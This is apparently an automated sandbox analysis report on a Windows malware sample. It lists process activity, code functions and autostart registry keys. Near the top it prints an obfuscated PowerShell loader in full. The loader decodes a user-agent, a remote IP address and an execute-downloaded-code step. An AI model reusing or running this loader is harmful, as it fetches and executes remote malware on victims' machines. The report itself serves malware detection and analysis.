Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F40944 push E95B7AD0h; ret 2_2_00007FF848F409C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F409F4 push E95B7AD0h; ret 2_2_00007FF848F409C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F46F87 push esp; retf 2_2_00007FF848F46F88
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_049CD6EA push esp; iretd 5_2_049CD739
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_078408C2 push eax; mov dword ptr [esp], ecx5_2_07840AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07840AAC push eax; mov dword ptr [esp], ecx5_2_07840AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_222E2806 push ecx; ret 8_2_222E2819
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00F67DE0 pushfd ; retf 14_2_00F67DF1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_075708C2 push eax; mov dword ptr [esp], ecx14_2_07570AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044693D push ecx; ret 16_2_0044694D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00451D54 push eax; ret 16_2_00451D61
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00451D34 push eax; ret 19_2_00451D41
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00444E71 push ecx; ret 19_2_00444E81
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00414060 push eax; ret 20_2_00414074
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00414060 push eax; ret 20_2_0041409C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00414039 push ecx; ret 20_2_00414049
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004164EB push 0000006Ah; retf 20_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00416553 push 0000006Ah; retf 20_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00416555 push 0000006Ah; retf 20_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F41328 push eax; iretd 25_2_21F41369
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F4225F pushad ; ret 25_2_21F427F9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F44219 pushad ; retn 000Dh25_2_21F44275
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F709AD push ecx; mov dword ptr [esp], ecx25_2_21F709B6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21F42851 push eax; iretd 25_2_21F42858

            Persistence and Installation Behavior

            barindex
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe

            Boot Survival

            barindex
            Creates multiple autostart registry keys
            Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VibekaJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VibekaJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VibekaJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
            Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
            Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004047CB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
